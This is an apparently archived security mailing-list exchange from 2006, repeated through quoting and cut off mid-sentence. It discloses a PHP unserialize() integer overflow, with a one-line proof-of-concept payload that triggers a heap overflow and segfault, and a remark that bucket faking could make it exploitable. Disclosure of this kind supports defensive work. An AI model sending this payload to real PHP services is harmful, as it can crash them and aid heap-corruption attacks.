"ia 32 bits poc"poc = Proof Of ConceptOn 10/18/06, Josh Bressers <
[EMAIL PROTECTED]> wrote:>> >> print_r(unserialize('a:1073741823:{i:0;s:30:"aa"}'));
> ?>>> in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow> here segfault in zend_hash_find() but
>
>
>
> print_r(unserialize('a:1073741823:{i:0;s:30:"aa"}'));
> ?>
>
> in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow
> here segfault in zend_hash_find() but it's possible to fake the bucket and
> exploit a zend_hash_del_index_or_key
> i tr
print_r(unserialize('a:1073741823:{i:0;s:30:"aa"}'));?>in function zend_hash_init() int overflow ( ecalloc() )-> heap overflowhere segfault in zend_hash_find() but it's possible to fake the bucket and exploit a zend_hash_del_index_or_key
i tried a memory dump , just